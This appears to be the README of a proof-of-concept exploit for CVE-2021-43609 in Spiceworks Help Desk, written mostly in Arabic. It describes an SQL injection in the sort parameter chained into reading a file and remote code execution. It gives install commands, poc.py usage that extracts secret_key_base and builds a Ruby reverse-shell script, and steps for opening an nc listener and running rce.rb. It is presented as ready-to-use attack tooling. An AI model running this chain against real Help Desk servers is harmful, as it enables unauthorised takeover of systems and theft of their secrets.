
استغلال إثبات المفهوم لـ CVE-2021-43609 يوضح سلسلة حقن SQL إلى قراءة ملفات إلى تنفيذ كود عن بُعد ضد برنامج مكتب مساعدة Spiceworks.
توجد ثغرة SQLi في معامل sort في Spiceworks. سلسلة الاستغلال الكاملة هي SQLi -> file read -> RCE.
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install
استخدم poc.py لاستغلال SQLi -> قراءة الملف واستخراج متغير البيئة secret_key_base. سيقوم بعد ذلك بإنشاء سكربت PoC بلغة Ruby للحصول على قشرة عكسية، بالاعتماد على القيم التي تم الحصول عليها من poc.py.
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]
There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.
optional arguments:
-h, --help show this help message and exit
--rhost RHOST https://example.com
--lhost LHOST 10.10.10.10
--lport LPORT 9001
-u USER, --user USER [email protected]
-p PASSWORD, --password PASSWORD
P@$$w0rd!
-e ENV_PATH, --env_path ENV_PATH
Path to environment variables
استخدم rce.rb. شغّل مستمع nc على عنوان IP والمنفذ اللذين أدخلتهما في المرحلة 1، ثم ببساطة:
cd rce && ruby rce.rb
وها هو!